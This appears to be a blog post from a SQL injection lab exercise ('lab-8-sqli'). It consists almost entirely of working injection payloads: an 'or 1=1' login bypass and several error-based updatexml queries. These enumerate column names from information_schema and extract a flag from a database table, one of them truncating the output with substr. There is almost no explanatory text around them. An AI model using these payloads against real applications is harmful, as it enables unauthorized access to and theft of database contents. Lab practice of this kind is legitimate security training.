lab-8-sqli
1 | select * from username where user='admin' or 1=1 #' |
1 | searchitem=flag' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flags'),0x7e),1) # |
1 | searchitem=flag' and updatexml(1,concat(0x7e,(select group_concat(flag) from sqli.flags),0x7e),1) # |
1 | searchitem=flag' and updatexml(1,concat(0x7e,(select substr(flag,-30) from sqli.flags),0x7e),1) # |
All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
wechat
Related Articles
Comment